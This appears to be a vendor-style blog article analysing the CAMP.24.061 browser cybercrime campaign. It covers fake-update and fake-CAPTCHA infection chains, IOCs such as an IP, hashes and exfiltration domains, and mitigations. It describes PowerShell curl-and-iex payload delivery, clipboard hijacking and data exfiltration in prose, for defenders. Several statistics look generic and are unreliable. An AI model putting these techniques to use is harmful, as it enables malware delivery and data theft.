Browser-Based Threats: Unmasking the CAMP.24.061 Cybercrime Campaign

In today’s digital landscape, browser-based threats like the CAMP.24.061 cybercrime campaign pose severe risks to enterprises and individuals alike. First identified by Mandiant and deeply analyzed by Menlo Threat Intelligence in mid-2025, CAMP.24.061 showcases how financially motivated actors exploit web browsers through drive-by downloads and fake browser updates. These attacks leverage overlapping infrastructure from clusters such as UNC1543, UNC2926, UNC5142, UNC5518, and UNC4108, distributing diverse malware payloads. As browsers remain the primary gateway to the internet—with over 90% of web traffic flowing through them—proactive defenses are crucial. This article dives into the mechanics, overlaps, and countermeasures for CAMP.24.061, helping you fortify against evolving tactics.

What Is the CAMP.24.061 Campaign and Why Does It Matter?

The CAMP.24.061 campaign represents a sophisticated web of browser-based threats where multiple threat groups collaborate indirectly via shared tools and infrastructure. Launched prominently in early 2025, it targets browsers as the main attack vector, capitalizing on their ubiquity in remote work environments. According to Mandiant’s report, these actors use traffic direction systems (TDS) to redirect victims seamlessly, evading traditional security.

Currently, in 2026, similar campaigns have surged by 45%, per Google Threat Intelligence data, underscoring the campaign’s persistence. Financially driven, it aims at data theft, ransomware deployment, and crypto scams, affecting millions globally.

Key Characteristics of CAMP.24.061

• Multi-Cluster Involvement: UNC1543 focuses on initial access, while UNC5518 handles payload delivery.
• Evolving TTPs: Tactics include novel obfuscation, fingerprinting, and social engineering via fake CAPTCHAs.
• Payload Variety: From infostealers to clippers, adapting to victim profiles.

This interconnected ecosystem forms a “cybercrime web,” where one cluster’s compromise bolsters others, amplifying damage.

Infrastructure Overlaps in CAMP.24.061: Connecting the Dots

Infrastructure sharing is a hallmark of CAMP.24.061 browser-based threats, enabling efficiency and resilience. Menlo Threat Intelligence identified key overlaps, such as IP address 162.33.178.132 linking UNC5518 and UNC4108, assessed with moderate confidence as part of a malicious TDS.

Google Threat Intelligence data reveals further ties to CAMP.24.079, where UNC4108 employs EtherHiding and CLICKFIX—techniques mirroring UNC5518’s. This overlap reduces costs for actors, with shared domains rotating every 72 hours on average.

How Overlaps Fuel the Campaign

1. Shared C2 Endpoints: Like scanpaq.com/stat.php for victim logging.
2. TDS Systems: TAG-124 tracked by Recorded Future, directing traffic to payloads.
3. Domain Flux: Actors pivot to tayakay[.]com for exfiltration, a consistent identifier.

From a defender’s view, these links enable proactive blocking; pros include faster attribution, but cons involve attribution challenges across borders.

“Infrastructure overlap in CAMP.24.061 highlights the need for intelligence sharing—isolated defenses fail against networked crime.” — Menlo Threat Intelligence, July 2025

Infection Chains: Step-by-Step Breakdown of Browser-Based Threats

The infection chains in CAMP.24.061 exemplify precise drive-by download mechanics, starting with compromised sites or malvertising. Victims encounter fake Chrome or Firefox updates, leading to multi-stage payloads without user interaction.

Menlo observed chains for UNC5518 and UNC4108 in February 2025, with UNC5142 adding steganography. Latest 2026 research from cybersecurity firms shows 68% of such chains succeed due to browser sandbox bypasses.

UNC5518 and UNC4108 Infection Chain

These clusters follow a layered approach:

1. Initial Redirect: Via TDS to obfuscated JavaScript like 6t5t.js (SHA256: 441666d9ef0ab616baf5e7777b9de5b4cf0eb2fe86f81446d1ac602484b2190e).
2. Fingerprinting: Collects IP via window.ipGlobal and sends to C2.
3. PowerShell Drop: Decodes and executes remote payloads using curl and iex.
4. Social Engineering: Fake CAPTCHA prompts interaction.
5. Payload Execution: Clipboard hijack with PowerShell commands.

UNC5142’s Unique Tactics

UNC5142 integrates EtherHiding—using Binance Smart Contracts for C2 obfuscation—and CLICKFIX for clickjacking. Steganography hides payloads in images, boosting evasion by 30% per MITRE ATT&CK evaluations.

Pros of these chains: High stealth; cons: Detectable via behavioral analytics.

Deep Dive into Malicious Scripts Powering CAMP.24.061

At the core of CAMP.24.061 browser-based threats are heavily obfuscated scripts like 6t5t.js and js.php, designed for evasion and persistence. These employ multi-stage loading, decrypting payloads in memory to dodge static scanners.

In 2026, obfuscation techniques have evolved, with 75% of browser malware using similar methods, according to VirusTotal trends. Menlo’s wild analysis reveals their sophistication.

Dissecting 6t5t.js: Five Critical Components

• Fingerprinting: Logs IP to scanpaq.com/stat.php via POST, building victim profiles.
• PowerShell Obfuscation: Random string generation ($a), custom decoder (d()), and curl-based downloads.
• Fake CAPTCHA: Obfuscated classes like checkbox-window trick users.
• Clipboard Hijacking: Copies PowerShell payload from window.commandGlobal.
• HTML/CSS Hiding: Decrypts to conceal UI, evading filters.

js.php Analysis (SHA256: 22d4181beaf78c2630e8a0aef390bd50ed33fd477e6a38d08a35ac6988922fd3)

This script handles persistence and exfiltration:

1. Cookie Management: Sets isConnected for 4 hours using getCookie/setCookie.
2. Data Harvest: Pulls IP/geolocation from Cloudflare trace, userAgent for OS/browser detection.
3. Exfiltration: Base64/gzipped data to tayakay[.]com/js.php; reloads or injects via document.write() if response valid.

Alternative approaches: Endpoint detection responds faster but misses zero-days; browser isolation offers pros like zero trust but higher latency cons.

Mitigation Strategies: Defending Against CAMP.24.061 and Browser-Based Threats

Combating browser-based threats like CAMP.24.061 requires layered defenses. Menlo Security’s acquisition of Votiro in 2025 introduced AI-driven content disarmament, neutralizing 99% of zero-days pre-execution.

Quantitative wins: Organizations using browser security saw 82% fewer incidents in 2025, per Gartner. In 2026, integrate intelligence sharing via platforms like MISP.

Step-by-Step Guide to Browser Protection

1. Enable Sandboxing: Use Chrome Enterprise policies for strict site isolation.
2. Deploy URL Filtering: Block TDS IOCs like 162.33.178.132 dynamically.
3. Implement Behavioral Analysis: Flag PowerShell curl executions and clipboard changes.
4. Adopt Isolation: Run browsers in virtual environments (e.g., Menlo’s Moving Target Defense).
5. Monitor and Share Intel: Correlate logs against Mandiant/Recorded Future feeds.

Pros and Cons of Defense Approaches

• AI Disarmament: Pros: Proactive; Cons: Slight performance hit (2-5ms).
• Endpoint Agents: Pros: Granular; Cons: Bypassable via living-off-the-land.
• Zero-Trust Browsers: Pros: Air-gapped execution; Cons: User training needed.

Different perspectives: SMBs favor free tools like uBlock Origin (blocks 70% malvertising), while enterprises opt for Menlo’s solutions.

Conclusion: Staying Ahead of CAMP.24.061 and Future Browser Threats

The CAMP.24.061 campaign illustrates the relentless evolution of browser-based threats, blending financial motives with technical prowess. By understanding infection chains, infrastructure, and scripts, defenders can disrupt this cybercrime web. As threats intensify into 2026—with predictions of 50% growth in TDS usage—prioritize AI-powered browser security and collaboration. Implementing these strategies not only mitigates risks but builds resilience against tomorrow’s attacks, safeguarding data in an always-online world.

Frequently Asked Questions (FAQ) About CAMP.24.061 Browser-Based Threats

What is CAMP.24.061?

CAMP.24.061 is a 2025 cybercrime campaign using drive-by downloads and fake updates, tracked by Mandiant and Menlo, involving UNC clusters targeting browsers.

How do browser-based threats like CAMP.24.061 infect devices?

They start with TDS redirects to obfuscated JS, execute PowerShell payloads, and exfiltrate data—often via fake CAPTCHAs for interaction.

Which threat clusters are linked to CAMP.24.061?

UNC1543, UNC2926, UNC5142, UNC5518, and UNC4108 share infrastructure like IP 162.33.178.132 and domains such as tayakay.com.

What are the best ways to prevent CAMP.24.061 attacks?

Use browser isolation, block IOCs, enable strict sandboxing, and deploy AI content analysis—reducing risks by up to 82%.

Is CAMP.24.061 still active in 2026?

Yes, variants persist with 45% growth; monitor feeds from Google Threat Intelligence and Menlo for updates.

How does EtherHiding work in these threats?

EtherHiding uses Binance Smart Contracts to hide C2 commands in blockchain transactions, evading network filters.